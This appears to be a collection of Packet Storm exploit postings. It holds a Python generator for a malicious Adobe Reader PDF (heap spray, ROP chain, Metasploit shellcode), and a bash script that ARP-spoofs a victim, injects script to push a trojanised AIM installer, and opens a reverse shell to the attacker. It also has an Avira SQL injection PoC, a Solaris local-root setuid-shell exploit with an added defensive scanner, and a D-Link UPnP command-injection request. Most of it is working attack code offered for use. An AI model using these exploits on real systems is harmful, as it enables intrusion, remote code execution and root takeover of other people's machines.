          var slide_size=%%SLIDESIZE%%;
          var size = 200;
          var chunkx = "%%MINICHUNKX%%";
          var x = new Array(size);
          var y = new Array(size);
          var z = new Array(size);
          var pointers = new Array(100);
          var done = 0;
        </script>
        <?templateDesigner expand 1?>
      </variables>
      <subform w="576pt" h="756pt">
        <!-- This image field holds the crashing image -->
        <field name="ImageCrash">
          <ui>
            <imageEdit/>
          </ui>
          <value>
            <image aspect="actual" contentType="image/jpeg">%%BMPFREELFH%%</image>
          </value>
        </field>
      </subform>
      <event activity="initialize" name="event__initialize">
        <script contentType="application/x-javascript">
          // This script runs at the very beginning and
          // is used to prepare the memory layout
          util.message("Initialize");
          var i;
          var j;
          if (spray.done == 0){
              //Trigger LFH use
              var TOKEN = "\u5858\u5858\u5678\u1234";
              var chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2);
              for (i=0; i < spray.size; i+=1)
                  spray.x[i] = TOKEN + util.pack(i) + spray.chunkx.substring(0, chunk_len) + util.pack(i) + "";
              util.message("Initial spray done!");
              for (j=0; j < size; j++)
                  for (i=spray.size-1; i > spray.size/4; i-=10)
                      spray.x[i]=null;
              spray.done = 1;
              util.message("Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
          }
          // After this the form layout is rendered and the bug triggered
        </script>
      </event>
      <event activity="docReady" ref="$host" name="event__docReady">
        <script contentType="application/x-javascript">
          // This script runs once the page is ready
          util.message("DocReady");
          var i;
          var j;
          var found = -1;   // Index of the overlapped string
          var acro = 0;     // Base of the AcroRd32_dll
          // Search over all strings for the first one with the broken TOKEN
          for (i=0; i < spray.size; i+=1)
              if ((spray.x[i]!=null) && (spray.x[i][0] != "\u5858")){
                  found = i;
                  acro = (( util.unpackAt(spray.x[i], 14) >> 16) - util.offset("acrord32")) << 16;
                  util.message("Found! String number "+ found + " has been corrupted acrord32.dll:" + acro.toString(16) );
                  break;
              }
          // Behaviour is mostly undefined if not found
          if (found == -1){
              util.message("Corrupted String NOT Found!");
              event.target.closeDoc(true);
          }
          // Corrupted string was found let's generates the new
          // string for overlapping the struct before freeing it
          var chunky = "";
          for (i=0; i < 7; i+=1)
              chunky += util.pack(0x41414141);
          chunky += util.pack(0x10101000);
          while (chunky.length < spray.slide_size/2)
              chunky += util.pack(0x58585858);
          // Free the overlapping string
          util.message("Feeing corrupted string! Previous string will we used-free ("+(found)+")");
          for (j=0; j < 100000; j++)
              spray.x[found-1]=spray.x[found]=null;
          // Trigger several allocs that will fall over the structure
          for (i=0; i < 200; i+=1){
              ID = "" + i;
              spray.y[i] = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ "";
          }
          util.message("Allocated 20 chunks-y\\n");
          // Heap spraying make's baby jesus cry!
          // Construct the 0x1000 small chunk for spraying
          var obj = 0x10101000;
          var pointer_slide = "";
          pointer_slide += util.pack(acro+util.offset("rop4"));   //add esp,70;ret
          for (i=0; i < 27; i+=1)
              pointer_slide += util.pack(0x41414141);
          obj += pointer_slide.length*2;
          // ROP
          pointer_slide += util.pack(acro+util.offset("rop0"));   //XCHG EAX,ESP;ret
          pointer_slide += util.pack(acro+util.offset("rop1"));   //0x100A jmp getmodule
          pointer_slide += util.pack(acro+util.offset("rop2"));   //@0x04 - getProcAddress
          pointer_slide += util.pack(obj+0xDC);                   //@0x08 point to KERNEL32
          //@0x10
          pointer_slide += util.pack(obj+0xCC);
          pointer_slide += util.pack(0x43434343);                 // POPPED TO EBP
          pointer_slide += util.pack(acro+util.offset("rop3"));   // JMP EAX
          pointer_slide += util.pack(obj);                        //Points to offset 0 of this
          //@0x20
          pointer_slide += util.pack(obj+0x38);
          pointer_slide += util.pack(obj+0x38);
          pointer_slide += util.pack(0x1000);                     //SIZE_T dwSize,
          pointer_slide += util.pack(0x40);                       // DWORD flNewProtect,
          //0x30
          pointer_slide += util.pack(obj+0x34);                   //PDWORD lpflOldProtect
          pointer_slide += util.pack(0x00000000);                 //DWORD OldProtect
          pointer_slide += util.packhs("E9B1000000909090");
          //0x40
          pointer_slide += util.pack(acro);                       //Used by next stage
          pointer_slide += util.pack(0xCCCCCCCC);
          pointer_slide += util.pack(0xCCCCCCCC);
          pointer_slide += util.pack(0xCCCCCCCC);
          //0x50
          pointer_slide += util.pack(0xCCCCCCCC);
          pointer_slide += util.pack(0xCCCCCCCC);
          pointer_slide += util.pack(0xCCCCCCCC);
          pointer_slide += util.pack(0xCCCCCCCC);
          //0x60
          pointer_slide += util.pack(0xCCCCCCCC);
          pointer_slide += util.pack(0xCCCCCCCC);
          pointer_slide += util.pack(0xCCCCCCCC);
          pointer_slide += util.pack(0xCCCCCCCC);
          //0x70
          pointer_slide += util.pack(acro);
          pointer_slide += util.pack(0x48484848);
          pointer_slide += util.pack(0x49494949);
          pointer_slide += util.pack(0x49494949);
          //0x80
          pointer_slide += util.pack(0x49494949);
          pointer_slide += util.pack(0x50505050);
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          //0x90
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          //0xa0
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          //0xb0
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          //0xc0
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0x46464646);
          pointer_slide += util.pack(0xCCCCCCCC);
          pointer_slide += util.packs("VirtualProtect");
          //@0xCC
          pointer_slide += "\u0000";
          pointer_slide += "KERNEL32";
          pointer_slide += "\u0000";
          pointer_slide += "%%SHELLCODE%%";
          while (pointer_slide.length < 0x1000/2)
              pointer_slide += util.pack(0x41414141);
          pointer_slide = pointer_slide.substring(0,0x1000/2);
          util.message("Pointer slide size: " + pointer_slide.length);
          // And now ensure it gets bigger than 0x100000 bytes
          while (pointer_slide.length < 0x100000/2)
              pointer_slide += pointer_slide;
          // And the actual spray
          for (i=0; i < 100; i+=1)
              spray.pointers[i] = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + "";
          // Everything done here close the doc and
          // trigger the use of the vtable
          util.message("Now what?");
          var pdfDoc = event.target;
          pdfDoc.closeDoc(true);
        </script>
      </event>
    </subform>
    <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?>
    <?templateDesigner DefaultLanguage JavaScript?>
    <?templateDesigner DefaultRunAt client?>
    <?acrobat JavaScript strictScoping?>
    <?PDFPrintOptions embedViewerPrefs 0?>
    <?PDFPrintOptions embedPrintOnFormOpen 0?>
    <?PDFPrintOptions scalingPrefs 0?>
    <?PDFPrintOptions enforceScalingPrefs 0?>
    <?PDFPrintOptions paperSource 0?>
    <?PDFPrintOptions duplexMode 0?>
    <?templateDesigner DefaultPreviewType interactive?>
    <?templateDesigner DefaultPreviewPagination simplex?>
    <?templateDesigner XDPPreviewFormat 19?>
    <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
    <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
    <?templateDesigner Zoom 119?>
    <?templateDesigner FormTargetVersion 30?>
    <?templateDesigner SaveTaggedPDF 1?>
    <?templateDesigner SavePDFWithEmbeddedFonts 1?>
    <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>
  <config xmlns="http://www.xfa.org/schema/xci/3.0/">
    <agent name="designer">
      <!-- [0..n] -->
      <destination>pdf</destination>
      <pdf>
        <!-- [0..n] -->
        <fontInfo/>
      </pdf>
    </agent>
    <present>
      <!-- [0..n] -->
      <pdf>
        <!-- [0..n] -->
        <version>1.7</version>
        <adobeExtensionLevel>5</adobeExtensionLevel>
      </pdf>
      <common/>
      <xdp>
        <packets>*</packets>
      </xdp>
    </present>
  </config>
  <localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/">
    <locale name="en_US" desc="English (United States)">
      <calendarSymbols name="gregorian">
        <monthNames>
          <month>January</month>
          <month>February</month>
          <month>March</month>
          <month>April</month>
          <month>May</month>
          <month>June</month>
          <month>July</month>
          <month>August</month>
          <month>September</month>
          <month>October</month>
          <month>November</month>
          <month>December</month>
        </monthNames>
        <monthNames abbr="1">
          <month>Jan</month>
          <month>Feb</month>
          <month>Mar</month>
          <month>Apr</month>
          <month>May</month>
          <month>Jun</month>
          <month>Jul</month>
          <month>Aug</month>
          <month>Sep</month>
          <month>Oct</month>
          <month>Nov</month>
          <month>Dec</month>
        </monthNames>
        <dayNames>
          <day>Sunday</day>
          <day>Monday</day>
          <day>Tuesday</day>
          <day>Wednesday</day>
          <day>Thursday</day>
          <day>Friday</day>
          <day>Saturday</day>
        </dayNames>
        <dayNames abbr="1">
          <day>Sun</day>
          <day>Mon</day>
          <day>Tue</day>
          <day>Wed</day>
          <day>Thu</day>
          <day>Fri</day>
          <day>Sat</day>
        </dayNames>
        <meridiemNames>
          <meridiem>AM</meridiem>
          <meridiem>PM</meridiem>
        </meridiemNames>
        <eraNames>
          <era>BC</era>
          <era>AD</era>
        </eraNames>
</calendarSymbols> <datePatterns> <datePattern name="full">EEEE, MMMM D, YYYY</datePattern> <datePattern name="long">MMMM D, YYYY</datePattern> <datePattern name="med">MMM D, YYYY</datePattern> <datePattern name="short">M/D/YY</datePattern> </datePatterns> <timePatterns> <timePattern name="full">h:MM:SS A Z</timePattern> <timePattern name="long">h:MM:SS A Z</timePattern> <timePattern name="med">h:MM:SS A</timePattern> <timePattern name="short">h:MM A</timePattern> </timePatterns> <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols> <numberPatterns> <numberPattern name="numeric">z,zz9.zzz</numberPattern> <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern> <numberPattern name="percent">z,zz9%</numberPattern> </numberPatterns> <numberSymbols> <numberSymbol name="decimal">.</numberSymbol> <numberSymbol name="grouping">,</numberSymbol> <numberSymbol name="percent">%</numberSymbol> <numberSymbol name="minus">-</numberSymbol> <numberSymbol name="zero">0</numberSymbol> </numberSymbols> <currencySymbols> <currencySymbol name="symbol">$</currencySymbol> <currencySymbol name="isoname">USD</currencySymbol> <currencySymbol name="decimal">.</currencySymbol> </currencySymbols> <typefaces> <typeface name="Myriad Pro"/> <typeface name="Minion Pro"/> <typeface name="Courier Std"/> <typeface name="Adobe Pi Std"/> <typeface name="Adobe Hebrew"/> <typeface name="Adobe Arabic"/> <typeface name="Adobe Thai"/> <typeface name="Kozuka Gothic Pro-VI M"/> <typeface name="Kozuka Mincho Pro-VI R"/> <typeface name="Adobe Ming Std L"/> <typeface name="Adobe Song Std L"/> <typeface name="Adobe Myungjo Std M"/> </typefaces> </locale> <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet> <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"> <xfa:data xfa:dataNode="dataGroup"/> </xfa:datasets> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 "> <rdf:RDF 
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about=""> <xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate> <xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool> <xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate> <xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate> </rdf:Description> <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about=""> <pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer> </rdf:Description> <rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" rdf:about=""> <xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID> <xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID> </rdf:Description> <rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/" rdf:about=""> <dc:format>application/pdf</dc:format> </rdf:Description> </rdf:RDF> </x:xmpmeta> <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve"> <annots/> </xfdf></xdp:xdp> ''' assert len(shellcode) <= 0xF00, "You need a smaller shellcode, sorry" #shellcode xdp = xdp.replace("%%SHELLCODE%%",UEncode(shellcode)) xdp = xdp.replace("%%SLIDESIZE%%", "0x%x"%SLIDESIZE); xdp = xdp.replace("%%MINICHUNKX%%",UEncode('O'*SLIDESIZE)) xdp = xdp.replace("%%BMPFREELFH%%",mkBMP('\x01\x00\x00\x00\x00\x00'+ chr(0x27)+'\x05',True).encode('base64')) #xdp = xdp.replace("%%BMPFREELFH%%",file("/usr/share/pixmaps/gnome-news.png","rb").read().encode('base64')) file("%s.log"%sys.argv[0].split('.')[0],'wb').write(xdp) #The document doc = PDFDoc() #font font = PDFDict() font.add("Name", PDFName("F1")) font.add("Subtype", PDFName("Type1")) font.add("BaseFont", PDFName("Helvetica")) #name:font map fontname = PDFDict() fontname.add("F1",font) #resources resources = PDFDict() resources.add("Font",fontname) #contents contentsDict = PDFDict() contents= PDFStream(contentsDict, '''BT /F1 24 Tf 100 100 Td (Pedefe Pedefeito Pedefeon!) 
Tj ET''') #page page = PDFDict() page.add("Type",PDFName("Page")) page.add("Resources",resources) page.add("Contents", PDFRef(contents)) #pages pages = PDFDict() pages.add("Type", PDFName("Pages")) pages.add("Kids", PDFArray([PDFRef(page)])) pages.add("Count", PDFNum(1)) #add parent reference in page page.add("Parent",PDFRef(pages)) xfa = PDFStream(PDFDict(), xdp) xfa.appendFilter(FlateDecode()) doc.add(xfa) #form form = PDFDict() form.add("XFA", PDFRef(xfa)) doc.add(form) #shellcode2 shellcode2 = PDFStream(PDFDict(), struct.pack("<L",0xcac0face)+"\xcc"*10) doc.add(shellcode2) #catalog catalog = PDFDict() catalog.add("Type", PDFName("Catalog")) catalog.add("Pages", PDFRef(pages)) catalog.add("NeedsRendering", "true") catalog.add("AcroForm", PDFRef(form)) adbe = PDFDict() adbe.add("BaseVersion","/1.7") adbe.add("ExtensionLevel",PDFNum(3)) extensions = PDFDict() extensions.add("ADBE", adbe) catalog.add("Extensions",extensions) doc.add([catalog,pages,page,contents]) doc.setRoot(catalog) #render it return doc.__str__() if __name__ == '__main__': import optparse,os from subprocess import Popen, PIPE parser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit') parser.add_option('--debug', action='store_true', default=False, help='For debugging') parser.add_option('--msfpayload', metavar='MSFPAYLOAD', default="windows/messagebox ", help="Metasploit payload. Ex. 
'win32_exec CMD=calc'") parser.add_option('--payload', metavar='PAYLOAD', default=None) parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation') (options, args) = parser.parse_args() if options.doc: print __doc__ os.exit(-1) if options.debug: print mkXFAPDF(), os.exit(-1) if options.payload == None: #"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R" msfpayload = Popen("msfpayload4.4 %s R"%options.msfpayload, shell=True, stdout=PIPE) shellcode = msfpayload.communicate()[0] else: shellcode = file(options.payload, "rb").read() #options.hexpayload.decode('hex') print mkXFAPDF(shellcode),
-
Description: AOL Instant Messenger versions 8.0.1.5 and below suffer from a binary file planting vulnerability.
Author: Marshall Whittaker
Source: AOL Instant Messenger 8.0.1.5 Binary Planting ≈ Packet Storm
Code:

```bash
#!/bin/bash
### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIMs advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.
### Marshall Whittaker

ATTACKER="192.168.2.10";
VICTIM="192.168.2.5";
GATEWAY="192.168.2.1";
REVPORT="443";
PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";

mkdir ~/aimpwn;
echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter;
echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter;
echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter;
echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;

### wget section.
#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;
cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;

### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to
### change ATTACKER IP or port.
ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ &
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;
```
-
Description: Avira Analysis Web Service suffers from a remote SQL injection vulnerability.
Author: Ebrahim Hegazy
Source: Avira Analysis Web Service SQL Injection ≈ Packet Storm
Code:

Title:
======
Avira Analysis Web Service - SQL Injection Vulnerability

Date:
=====
2013-07-08

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=997

VL-ID:
=====
997

Common Vulnerability Scoring System:
====================================
8.5

Abstract:
=========
The Vulnerability Laboratory Core Research Team discovered a critical SQL Injection vulnerability in the Avira Analysis online service application.

Report-Timeline:
================
2013-05-25: Vendor Notification
2013-05-26: Vendor Response/Feedback
2013-06-31: Vendor Fix/Patch
2013-07-08: Public Disclosure

Status:
========
Published

Affected Products:
==================
Avira
Product: Analysis - Web Application & Online Service 2013 Q2

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A remote SQL Injection web vulnerability is detected in the official Avira Analysis online service application.
The vulnerability allows remote attackers to inject own sql commands to compromise the affected application dbms.

The SQL Injection vulnerability is located in the `overview` file when processing a request with a manipulated `uniqueid` parameter.
By manipulation of the `uniqueid` parameter the attackers can inject own sql commands to compromise the webserver application dbms.
When trying to bypass the filter validation by using a single quote or a double quote to check if the parameter is vulnerable or not,
attackers will be redirected to another page, but when the attacker sends a request with a back-slash the context will be executed
and new mysql errors will become visible for exploitation.

The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction.
Successful exploitation of the sql injection vulnerability results in web application and online service dbms compromise.

Vulnerable Module(s):
[+] en

Vulnerable File(s):
[+] overview

Vulnerable Module(s):
[+] uniqueid

Proof of Concept:
=================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account
and without required user interaction. For demonstration or reproduce ...

Vulnerable Service Domain: analysis.avira.com
Vulnerable Module: en
Vulnerable File: overview
Vulnerable Parameter: uniqueid

Note: When trying to use a single quote or a double quote to check if the parameter is vulnerable or not, you will be redirected to
another page, but when processing to load with a back-slash new mysql errors will become visible for exploitation.

POC:
https://analysis.avira.com/en/overview?start=0&uniqueid=1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg\[SQL INJECTION VULNERABILITY!]

PoC Video: http://www.youtube.com/watch?v=Odko5PTKA-Q

Reference(s):
https://analysis.avira.com/

Solution:
=========
The vulnerability can be patched by a restriction and secure parse of the uniqueid parameter request.

Risk:
=====
The security risk of the remote sql injection web vulnerability is estimated as critical.

Credits:
========
Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [Zigoo] (ebrahim@evolution-sec.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with
fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
-
Description: Solaris Recommended Patch Cluster 6/19 suffers from a local root command execution vulnerability on x86.
Author: Larry W. Cashdollar
Source: Solaris Recommended Patch Cluster 6/19 Local Root ≈ Packet Storm
Code:

Solaris Recommended Patch Cluster 6/19 local root on x86
Larry W. Cashdollar 7/3/2013 @_larry0

If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.

Local root: Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.

./144751-01/SUNWos86r/install/postinstall

```sh
782 if [ -s /tmp/diskette_rc.d/rcs9.sh ]
783 then
784 /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
785 fi
```

Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?

```sh
804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)
805 TMPFILE=/tmp/ncrstmp
806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driver_aliases >$TMPFILE
807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases
```

./141445-09/SUNWos86r/install/postinstall

```sh
656 if [ -s /tmp/diskette_rc.d/rcs9.sh ]
657 then
658 /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
659 fi
```

Well, it looks like you've got a few chances to abuse it:

```
larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \;
./144501-19/SUNWos86r/install/postinstall
./141445-09/SUNWos86r/install/postinstall
./142059-01/SUNWos86r/install/postinstall
./147148-26/SUNWos86r/install/postinstall
./127128-11/SUNWos86r/install/postinstall
./148889-03/SUNWos86r/install/postinstall
./142910-17/SUNWos86r/install/postinstall
./144751-01/SUNWos86r/install/postinstall
```

Pseudo PoC: Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry. chmod 666 /etc/shadow would be easy.

PoC:

```
larry@slowaris:~$ cat setuid.c
```

```c
#include <stdio.h>
#include <unistd.h>

int main (void)
{
  char *shell[2];

  shell[0] = "sh";
  shell[1] = NULL;
  setregid (0, 0);
  setreuid (0, 0);
  execve ("/bin/sh", shell, NULL);
  return(0);
}
```

```
gcc -o /tmp/r00t setuid.c

larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh
chown root:root /tmp/r00t
chmod +s /tmp/r00t
```

After patches have been applied:

```
larry@slowaris:~$ /tmp/r00t
# id
uid=0(root) gid=0(root)
```
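An added example, not part of the advisory: a small Python scanner that generalises the author's find/grep, flagging any line in a patch cluster's *install scripts that hands a path under /tmp or /var/tmp to a shell, whatever the path is called. The sample scripts, the `${ARCH}` case branch and the 999999-01 patch id in them are constructed.

```python
import os
import re
import shutil
import tempfile

# A shell (by path or bare name) or `.`/`source` followed by a temp path.
EXEC_RE = re.compile(
    r"(?:^|[\s;&|(`])"
    r"(?:(?:/usr)?/s?bin/(?:sh|ksh|bash)|sh|ksh|bash|\.|source)\s+"
    r"(/(?:var/)?tmp/[^\s;&|)`]+)"
)
# A temp path executed directly as the command itself.
DIRECT_RE = re.compile(r"(?:^|[;&|(`])\s*(/(?:var/)?tmp/[^\s;&|)`]+)")


def scan_script(path):
    """Return (lineno, tmp_path, line) for every flagged line of one script."""
    hits = []
    with open(path, errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            code = line.split("#", 1)[0]  # crude: drop trailing comments
            match = EXEC_RE.search(code) or DIRECT_RE.search(code)
            if match:
                hits.append((lineno, match.group(1), line.rstrip()))
    return hits


def scan_patch_cluster(root):
    """Walk an unpacked cluster; return sorted (relative path, lineno, tmp_path)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith("install"):  # preinstall/postinstall/checkinstall
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            for lineno, tmp_path, _ in scan_script(full):
                findings.append((rel, lineno, tmp_path))
    return sorted(findings)


# Constructed sample: the lines quoted from 144751-01's postinstall, placed in
# an x86 case branch as the advisory describes.
VULNERABLE_POSTINSTALL = """#!/sbin/sh
# constructed sample modelled on the snippet quoted in the advisory
case "${ARCH}" in
i386)
    if [ -s /tmp/diskette_rc.d/rcs9.sh ]
    then
        /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
    fi
    ;;
esac
TMPFILE=/tmp/ncrstmp
sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driver_aliases >$TMPFILE
cp $TMPFILE ${BASEDIR}/etc/driver_aliases
exit 0
"""

# Constructed clean sample: writes to /tmp but never executes anything there.
CLEAN_POSTINSTALL = """#!/sbin/sh
TMPFILE=/tmp/ncrstmp
cp ${BASEDIR}/etc/driver_aliases $TMPFILE
exit 0
"""

SAMPLE_TREE = {
    "144751-01/SUNWos86r/install/postinstall": VULNERABLE_POSTINSTALL,
    "999999-01/SUNWexample/install/postinstall": CLEAN_POSTINSTALL,  # placeholder id
}


def demo():
    """Write the sample tree to a temp dir, scan it, clean up, return findings."""
    root = tempfile.mkdtemp(prefix="patchscan-")
    try:
        for rel, content in SAMPLE_TREE.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(content)
        return scan_patch_cluster(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for rel, lineno, tmp_path in demo():
        print("%s:%d executes %s" % (rel, lineno, tmp_path))
```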
-
Description: D-Link devices DIR-300 rev B, DIR-600 rev B, DIR-645, DIR-845, and DIR-865 suffer from a remote command injection vulnerability. The vulnerability is caused due to missing input validation in different XML parameters.
Author: Michael Messner
Source: D-Link UPnP OS Command Injection ≈ Packet Storm
Code:

Vendor: D-Link
Devices: DIR-300 rev B / DIR-600 rev B / DIR-645 / DIR-845 / DIR-865

============
Vulnerable Firmware Releases:
============
DIR-300 rev B - 2.14b01
DIR-600 - 2.16b01
DIR-645 - 1.04b01
DIR-845 - 1.01b02
DIR-865 - 1.05b03

Other devices and firmware versions may be also vulnerable.

============
Vulnerability Overview:
============
* Unauthenticated OS Command Injection

The vulnerability is caused by missing input validation in different XML parameters. This vulnerability could be exploited to inject and execute arbitrary shell commands.

WARNING: You do not need to be authenticated to the device to insert and execute malicious commands.

Hint: On different devices wget is preinstalled and you are able to upload and execute your malicious binary.

=> Parameter: NewInternalClient, NewInternalClient, NewInternalPort

Example Request:

```http
POST /soap.cgi?service=WANIPConn1 HTTP/1.1
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
Host: 10.8.28.133:49152
Content-Type: text/xml
Content-Length: 649

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewPortMappingDescription></NewPortMappingDescription>
      <NewLeaseDuration></NewLeaseDuration>
      <NewInternalClient>`COMMAND`</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewExternalPort>634</NewExternalPort>
      <NewRemoteHost></NewRemoteHost>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>45</NewInternalPort>
    </m:AddPortMapping>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```

You could use miranda for your own testing:

* NewInternalClient
  Required argument:
    Argument Name: NewInternalClient
    Data Type: string
    Allowed Values: []
    Set NewInternalClient value to: `ping 192.168.0.100`

* NewExternalPort
  Required argument:
